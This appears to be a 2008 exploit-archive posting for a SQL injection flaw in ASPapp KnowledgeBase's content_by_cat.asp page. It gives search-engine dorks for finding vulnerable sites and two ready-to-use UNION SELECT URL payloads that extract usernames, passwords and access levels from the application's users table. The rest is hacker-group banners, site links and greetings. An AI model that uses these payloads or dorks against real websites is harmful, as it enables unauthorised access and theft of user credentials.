ASPapp Knowledge Base Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ASPapp Knowledge Base Remote SQL Injection Vulnerability
# Published : 2008-03-20
# Author : xcorpitx
# Previous Title : RunCMS Module section (artid) Remote SQL Injection Vulnerability
# Next Title : ASPapp (links.asp CatId) Remote SQL Injection Vulnerability

..##.....##     
...##...##      
....##.##
.....###CoRPITX 
.....###     
....##.##
...##...##
..##.....##

-------------------------Turkey------------------------------
                                               
-----------------www.Hayalet-hack.com------------------------

-----------------www.xcorpitx-hack.com-----------------------

ASPapp KnowledgeBase (content_by_cat.asp?catid) SQL Injection Vulnerability 
-------------------------------------------------------------

-------
Dork 1 -  content_by_cat.asp?contentid ''catid'' 

Dork 2 -  content_by_cat.asp? ''catid''  
-------
exploit-
-------

-------------------------------------------------------------
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accesslevel,5,null,7,null,user_name+from+users
-------------------------------------------------------------

-------------------------------------------------------------
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accesslevel,5,null,7,8,user_name+from+users
-------------------------------------------------------------

thanx- str0ke-D3ng3siz-pc faresi-s@bun-Hayalet-Turque-

# www.Syue.com [2008-03-20]